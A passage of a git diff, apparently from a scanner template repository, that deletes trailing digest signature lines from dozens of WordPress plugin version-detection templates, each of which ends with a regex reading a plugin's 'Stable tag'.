b/http/technologies/wordpress/plugins/classic-editor.yaml index 0bbf5264709..04e090313f6 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220320b80bf745b19c3e372f9c5729446ce6ba6d179f7d6d7d7704ebbcd9f846604022100fa9f57fa8b46ea6ff9641156123fae1d71ab7934201c4dc7d0f50bbcc639c2d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 1eabc28f823..57e618924be 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220086facc27f54576458d73621d1b49613bac1f7f44f41dd64686719ac0f068a69022038fd3e84b686a03cc9156372c01518580bf5d1b9ed8b98068d0e89144e5c8766:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 5517c155272..571b3b20a39 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220175125395811df3f8fab5a00d2a2ca40390bc8fad3cc441415ebb673eb887776022100d6f98a488d6ed79e29b987c843216f147cb2ae39901a6500b8c5248d4be0cc2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index a4f7a4644fd..4d562316b4a 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eb18f314edf4b8bfdd9fb367ef987fee5cf20881c7566c20484a1b6acb526ed9022057aca81b080ddd34025d3c7b8690c7808205a0f87c20e72b7fda1575bc5a61cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index cba3cd185e2..dcea952545d 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207e29b389eb4881a631ca421177286f3b0ac9b8e4cf21b80093357e36a0a8a9db0221008c06804f5185e8fdb7b40e02891a07e6fb11e43f2f844d4487ca85b6fa8a0997:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index ed6c79a1fda..0ae2f181225 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100958bf73766039f8ad668aead372f2e35e6e48afbd4b687c4d0a44d929112af47022100dabe7f376b59c3a98305052cbdba06aaa9491ff143a77c9f80bac41c2a1227e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 39ae5a327d7..12f549d5369 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210082a9f28167351c924ddb746f67827480228856ccb5f1bfb83263c1809fafa16c0220077f16f52851cf2db2617fde87d0530b80241743619242b990689651aea9302c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d6d40bf3c2a..d8ea6a72f1d 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204f664283df35c44b120a73056eaa98b86dc4f2124c5105540fad59d64210572e02201140b396774514c382e105dc00ad3e7be5d493a18ee36a8e0a014c4cfd356ee7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index dfc31222b6e..4afaf9dc979 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203f0aac20584ec48b1778b28b0362efb1f75c9ebc044e2a8ce9f36b40315c3e02022100feba53a208d9415687de52a7cedf45dc178f9b75703ce2c6d84a61bf15b8789c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 0089b9f62de..88fea67f934 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fba7f95278217ef3891342f77e1552ea7ddde5fb40cef67b66cd6b9f50c2798a02207ff26bcc58aca7769556d99a7c1f4c9acdb05628f3a93dce4f314073f420a239:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 1d191afa7a8..d205cdbf361 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206ab50fcbc6f603b20bd69f28cb49520f9d0c542b24aff300e6143e3ac4f757e6022028160f9ccfb2e99430ba7769ddcaee074959b2e9e5e9ba931a7c14db541f3643:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 7a05272abc4..3fa20df7d26 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ac2916f526cfb8184b2fb67b3496295cd5f0554ee7ebc1881ffb18c993a87f2f022064c3c5fa539c83533ca36eecbe03122987c5727bb0faf09991d38a2154ad78a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 9f7c483ee57..bcd63ced86e 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ee989f0277e7887d0abd7c2245e303fef1f01fbd90e271d1cc759a23c96a9ebe02204b5707d27627158436d4f841a4a9d367b0d8eee1108e436a5ce88794a8e5c7d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 5acc9e1d2d7..bca0326f2b6 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022066418ed3615ad26f9c809dd9905d0069c80d7d7e48e227e9a28bc4a235eae8b802201b6956684bf340f20579a916c355d78206cd60717901a9ed3c625951a458b8b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 38ec8f91b43..854328f04b0 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ac36578b95d5687bc794ab64933fda9d8c80eb6ffd900f49dc3dbdda867c5053022100af01f6e6bf8d8f3f2284661ac78489ef0940cded8a041829b34d4b34aaebd2c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index af5cb35bac2..6d3f7f4566f 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205bd41888b5090f9af1a5408d752a5ef273305bb356a2022a297cfc948b804fd4022100e4e701e44b3406daae332989d983e78cf2c247dc5b67a22f1a6f976e3e25e770:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 5cfc6fb36ab..a923d21a154 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f5ec5f75c69553bfc64c4f8d5cbe76f19949e62096371e78d4aeeb9630c1ea6402206886d9387a06e90e967a3356656e32660e65eb86b4f13673726aa87dcfe4a0dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 0d72d49e363..f10480fc8f2 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220660af0774476724f84fa679fd2017d2596459e9559dcde6b75a9aa47d74dd9f4022100dd481033cca0ae8da25204b55b7b22945eed0c2fca563ff7667985c4b88dd681:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 809237f5c06..6c920917673 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022036b77972c7dee251d6e25ff0abb314f6e348325d57ad4bf23aef8cb35e024817022021df0d8e2525884182b898e8cd497ec04ec592d6a9b6e954a77d49ed04c2344e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 905d11b962f..b25c6c9a9ce 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205dbb1653347fb86864153815e7d0c19d636ba7b1bbcf394892c73bc1ae6de9d2022007e89944f1c871e8dd94d399340a105a49c614812282a72dc8e04efbf20eef5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index b1dc499ecd9..1781172d05e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203b93093b3c42ea7ccf5c6d65f9befe54fe36781a1d3e1cea005e50415a5355f602207cd07adc1be4e6e7191c49bb03a566299f00e14e12e8665e00f588a50cbe502c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index ca6ed62d210..92c8ce34093 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206af71ff66f99d9fb6e808127d6c7df3f34b472df97645af13a2a69542c8813f3022100a72b69cf766fb819604635c3819d3f79b224adf1f8d1d96f11dc25922cca3a48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eb189997425..eea42ed8dad 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b66043df62bb6576d8bb87dc0bc5855da297ae65f89ce92fb7ad5f68cb1c24a1022054d46b984737ba1cf5e22fdd3a320a5a8b2a5b5530432f9aede317849be7ff97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index c26996b4c7d..bedb85a0eba 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022002c1cf24dec33f8f193a11cec5f5f18c4bd5c7222c5b81ba1d351305ca6a1a7a022100aeb4e43eb289411db0684995c676579b79d8243d057fd2ab5044197ab3cc4eb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b5a1aed5096..45bbbc71df5 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c4677a47ad21948f7a03b80a7c9f99d4b4398fbcbfa41dedc745338a103ad215022100ffa61f3c39e41f404659b42b0a1b35b1e4fe11927a1a6fac3481b8dd153885d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 36f9f359e44..03befac73ed 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f0f18957bb8eabbf495f66913a6d19de1dd484519675f25b2e611d2b5b8f3e00022100f97743ae774265697c627738a5b088e2f853f946e5aa6365ce9019eebc765bb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 3b51607dea8..e1f00931279 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220092a8231483aae06790c1420248d5386ead2beec72293e33aab674153343c8fb02207eae756752d20100fd4c25dfda950e7a12c0bb20beff6939e8262a530aacc1d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f317ce87fef..0db316d66d6 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a5621513883dd829341863c4c1dd79de7061cbe30e43caf1754faed4214b149b02206c88a258bc655f2ed510f70fec75d42c2e2be5930968403cb5a9d1c222bbc6ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 80bccc9a1cf..135639253d8 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ebee108abc0370682684e26f5ef44e93bf0dac5e055fed50c4f41a4d0ba7494b022100bc3efa5d7adf5d73571891c17a603c0407a2cd1b7e94a1c3f09d25e0ea0c0aba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 82985feac34..540fbaf9ace 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e31ba6cef21a95c903effa838f58a8b44758bdf74c4327948bf95a27a323e3fe0220700ed292c0743151eb66af86d92ff36ce47352fe871c85929672236645437576:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 2f3de46b98c..7e71b4736fd 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202d2c7afb42705f21e61c8aff58cdf21f17fd9b3f4ff8b19b28c30079a135f99b02204caeb13087a12cc1b50f379aa0e0089a1d4eafa9c46156a85963f67f04cfd6b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index b36930e72a6..88a70b24789 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203f1c567d2f6f5d5bf399dee9d1d32332ff59b37ab4e69c86fc338cf25d0697990220668af29bcdf6eaae77c4509254d56ddf69a95c36c92fc55f88105f1cfdf78684:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index d3920fbb823..fc498e67e6d 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aee45eb3088a28d53b344fb59bf6006227627dfe030c3d9b81f367682cedd810022077431c6fd8bea9aa8e5ef50a377db84d0418e3cd0ece3cb7f9795fe8c88afcf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index fb749ac9b29..465aa93d578 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f9dd558f40be08e42028d83577e5b9b9ad30d71c112bef7b9a45f20a63f6af99022031562fe74c96dd77be9c6ee763fe85048bfef763394c386fef99b92e1b2ac385:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 17e7d5f1a8a..2a1b0e57a90 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e1129b023cb9c7d9051d5e40177f33b09b605c030a23d22da8fe11412299a2ee02206875fac735222b817cc7e75cf14b805f5a0156c9ab627f824013ed1ed767b3bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index c620e0d5c67..df35e8b415d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022051864edc89e0c821ffbb2d37ce65f147ce54ae476328b306382524226cb97018022100b4a4a7295ee9f5d07437e50c97f4ed8e6bfea9c3318375a44d1b212c5fe06e90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index c660873526c..033cc4bc3d2 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c3987fd448473e025f661c51d9c721550c8d903fb4b0c5d7524fe837fca238d9022100d9c129ae9538cbdb5abe7005f48d76f7dd518366f1eb16b17687f9a0424d67f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index a86c3402ab0..945ab6ad03c 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210097aab7942769d3f255ce22bac1c934d649c49a7dabbc55bd409fbd439a7b8159022100a41ecaf553f6e6ea581709c0628397e540a4ad4001825bc62ec483de6291f30d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 9a0e94220e2..2072b51ab9c 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203a0a41b9d1c68cb3bfe8557b35c02527ff239ac533007f838821bc5774ad0604022100e6c6f70632e54c7d034ff7d623656c3a2df1073c1685f242eac2e5ad73e3a5d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index e541cc604b4..b509d8cc670 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022009efc23e465a4d654e640d002bcaf1fd71257b9976452e7dd9ddc87fe196871d02204a6e6ac975604f16a4c0e4105d91b0d182460d5e64c02d4bf57df39407416730:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index d853f91a478..c984479bde5 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b451e436020341331a7a9f16b099ec8d543eb0c37f46eb8a0a30d1c11c418353022006f9cbf8e2d8e882a8efbee13a373a0a903c5c55f91e9169c6e4e825216b0ad8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 47ce737abd1..a3870175c7d 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cdc282dbc9380e38d21cefba1782ab87458beb9e643c9d4f69561a86c01444c2022100b4ab48249a80744e413cd31ce5cb7a506f55071e58c85711d9f50d083916b184:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 1a875c0b965..f5f3818ea24 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220269c9035dd796ad880637db3cf65adc51c7d6ed8af6a8d045024626f78d718410221009df9fefc4b902f91483e9f5e21e69549a5ff692e1082cef95a1c930c69972488:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index d8e7f933976..7e5b54c12c7 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f1b3f3fb230131675bde854da09a3d7c54d9b3a4ba1fc30a236198f5fdba421f0220294bbd346ca26121daafabe8e400e80ea52a3ab5cb9d09e0f99608483f48164b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 46f2d731f0d..59effd09f64 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200aa75f7a526cfe2a35a2b23f38e0816f67db2301653a3b4e05060da5ffe31056022100ad4f991133543cbd6e03af334da81a6011625dbdb3b950e2bccbd0fd7dbb7e30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index daf8fa2d053..833207dcff4 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b85b96bfe5fb593c31623d25dca93754eb54d943481fe7b4bbd531a674962554022100dde70b28b9be4d00cc165c496a404d4829bf4cc7fe397aca8ea53d5233aa0dea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 6fcf4511351..b7ea2d38d1c 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 